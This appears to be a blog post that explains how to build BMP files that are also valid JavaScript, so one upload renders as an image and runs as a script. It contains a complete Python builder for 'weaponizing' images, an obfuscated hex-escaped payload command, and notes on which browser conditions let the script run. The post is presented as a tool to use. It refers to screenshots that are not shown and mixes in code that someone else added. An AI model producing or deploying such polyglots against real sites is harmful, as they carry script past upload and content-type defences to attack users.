Opening this file in a browser gives the following result:
As you can see, both tags executed successfully. The image tag shows the red bitmap and the script tag does its job by executing the JavaScript. How is that possible? How do you write such a file? The following images show more details about the dirty code that generates these bitmap files.
The creation procedure.
The substitution procedure.
This is not magic at all. It is just my implementation of a weakness in the way many libraries parse BMP files: the file-size field that follows the magic bytes is never checked, so it can hold arbitrary bytes. The idea behind the Python code is to build a valid BMP header in which the bytes right after the magic are \x2F\x2A (aka /*), and to close the image data with \x2A\x2F (aka */). Everything between the two is a JavaScript block comment, so the pixel data is ignored by the script engine (as long as it does not itself contain */, which would close the comment early). For the file to also be a valid JavaScript program, the only bytes the comment does not hide, the magic \x42\x4D (aka BM), must be consumed as an identifier: a variable, or part of an expression. This is why the payload is preceded by a simple expression such as "=1;" or, more commonly, "=a;" (the latter needs an a declared somewhere in the payload), turning the prefix into the statement BM=1; before the payload runs. The following image shows the first part of a forged BMP header that exploits this weakness.
Run it as: bmp.py -i image.bmp "alert(\"test\");"
python bmp.py -i 2.bmp "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);"
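The script shown in the screenshots is not reproduced on this page, so here is an added example (my own code, not the original bmp.py) that implements both procedures described above: it either generates a plain red 24-bit BMP or takes an existing one with -i, overwrites the file-size field with /*, appends */=1; plus the payload, and refuses to proceed if the image bytes already contain */. The 16x16 size, the solid red colour, the =1; prefix, the -o flag and the parse_header/js_view checks are my assumptions; the original tool's argument handling beyond -i is not shown on the page.

```python
"""BMP/JavaScript polyglot builder (added example, not the original bmp.py)."""
import argparse
import struct

BMP_FILE_HEADER = "<2sIHHI"        # magic, bfSize, bfReserved1, bfReserved2, bfOffBits
BMP_INFO_HEADER = "<IiiHHIIiiII"   # BITMAPINFOHEADER (40 bytes)


def build_red_bmp(width=16, height=16):
    """Create a minimal bottom-up 24-bit BMP filled with pure red (assumed size/colour)."""
    row = b"\x00\x00\xff" * width               # pixels are stored BGR, so red is 00 00 FF
    row += b"\x00" * ((4 - len(row) % 4) % 4)   # every row is padded to a 4-byte boundary
    pixels = row * height
    offset = 14 + 40                            # file header + info header
    file_header = struct.pack(BMP_FILE_HEADER, b"BM", offset + len(pixels), 0, 0, offset)
    info_header = struct.pack(BMP_INFO_HEADER, 40, width, height, 1, 24, 0,
                              len(pixels), 2835, 2835, 0, 0)
    return file_header + info_header + pixels


def find_premature_close(bmp):
    """Offset of the first '*/' after the size field, or -1 if the comment stays open."""
    return bmp.find(b"*/", 4)


def make_polyglot(bmp, payload, prefix="=1;"):
    """Substitution procedure: 'BM' + '/*' + rest of the image + '*/' + prefix + payload.

    Bytes 2..5 hold bfSize (little-endian). Lenient decoders never check it, so the
    low two bytes can be replaced by '/*'; the JS engine then sees BM/* ... */=1;payload
    """
    if bmp[:2] != b"BM":
        raise ValueError("input is not a BMP file")
    bad = find_premature_close(bmp)
    if bad != -1:
        raise ValueError("image contains '*/' at offset %d; the comment would close early" % bad)
    return b"BM/*" + bmp[4:] + b"*/" + (prefix + payload).encode()


def js_view(data):
    """What the script engine effectively executes: the block comment is whitespace."""
    text = data.decode("latin-1")               # one char per byte, nothing is lost
    start = text.index("/*")
    end = text.index("*/", start + 2)
    return text[:start] + text[end + 2:]


def parse_header(data):
    """What a lenient BMP decoder reads back; bfSize is returned but not validated."""
    magic, size, _r1, _r2, offset = struct.unpack_from(BMP_FILE_HEADER, data, 0)
    if magic != b"BM":
        raise ValueError("bad magic")
    _hdr, width, height, _planes, bpp = struct.unpack_from("<IiiHH", data, 14)
    return {"bfSize": size, "offset": offset, "width": width, "height": height, "bpp": bpp}


def main(argv=None):
    ap = argparse.ArgumentParser(description="build a BMP that is also valid JavaScript")
    ap.add_argument("-i", "--input", help="existing BMP to weaponize (default: generated red 16x16)")
    ap.add_argument("-o", "--output", default="poly.bmp")
    ap.add_argument("payload", help='JavaScript to run, e.g. alert("test");')
    args = ap.parse_args(argv)
    bmp = open(args.input, "rb").read() if args.input else build_red_bmp()
    data = make_polyglot(bmp, args.payload)
    with open(args.output, "wb") as fh:
        fh.write(data)
    print("wrote %s (%d bytes); JS sees: %s" % (args.output, len(data), js_view(data)[:80]))
    return data


if __name__ == "__main__":
    main()
```

Run it as `python bmp.py -i image.bmp -o poly.bmp 'alert("test");'` and reference poly.bmp from both an img and a script tag. Two practical caveats: a decoder that does validate bfSize (now 0x2A2F plus the original high bytes) will reject the image, and a browser only executes a script served with an image MIME type when the response lacks X-Content-Type-Options: nosniff.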
Enjoy your new hackish tool!
Source: marcoramilli.blogspot.com.es